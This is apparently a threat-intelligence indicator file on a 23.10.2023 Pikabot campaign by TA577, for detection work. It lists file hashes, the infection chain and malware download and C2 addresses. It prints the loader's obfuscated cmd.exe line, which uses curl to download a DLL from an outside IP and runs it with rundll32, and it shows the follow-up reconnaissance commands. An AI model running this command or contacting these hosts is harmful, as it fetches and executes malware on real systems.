Pikabot_23.10.2023.txt
23.10.2023 | Pikabot | TA577 | version: 1.1.15-ghost
*************************************************
.url https://pantiwilasa.app/teq/?1337
.zip cb685ba5b5e7bfe686839722d96ed6b9a13b95f61902d23f7b1e27632d569f9f
.dll 15e4de42f49ea4041e4063b991ddfc6523184310f03e645c17710b370ee75347
*************************************************
infection chain: url > zip > js > curl > dll
wscript.exe C:\Users\Admin\AppData\Local\Temp\R812.js
cmd.exe" /c xrN || eCho xrN & pinG xrN || CuRL http://45.32.194.209/OpW40B/preju -o %TMP%\xrN.dll & pinG -n 4 xrN || RUndLl32 %TMp%\xrN.dll, Crash & exiT FOBKz=gjStdz
pinG xrN
pinG -n 4 xrN
RUndLl32 C:\Users\Admin\AppData\Local\Temp\xrN.dll, Crash
SearchProtocolHost.exe
whoami.exe /all
ipconfig.exe /all
netstat.exe -aon
rundll32.exe C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
svchost.exe -k UnistackSvcGroup
*************************************************
distribution URL
https://pantiwilasa.app/teq/?1337
*************************************************
.dll distribution URLs
http://45.32.194.209/OpW40B/preju
http://64.176.214.231/RtJO/phlob
http://66.42.96.41/QIz/overs
http://144.202.90.10/AYp/opini
http://144.202.21.156/sYta1A/Litho
http://65.108.145.212/rVQw/ozono
http://65.108.81.144/Apqk1/Stere
http://95.216.153.152/YO3/navet
http://45.77.193.70/5nG/Hobbl
*************************************************
C2s (full URLs first, then bare IP:port endpoints)
https://155.138.156.94:5243/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://154.221.30.136:13724/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://51.68.146.19:5242/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://154.92.19.139:2222/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
https://15.235.143.190:2224/angarepPlasmophagous/P1WaaD9XaxgjV9?theatronCingulectomy=Tagwerk&Bharti=Waxworker
15.235.143.190:2224
155.138.156.94:5243
51.68.146.19:5242
154.221.30.136:13724
154.92.19.139:2222
139.99.216.90:13720
156.251.137.134:5000
154.12.252.84:23399
85.215.218.128:5243
103.231.93.15:5631
196.218.123.202:13783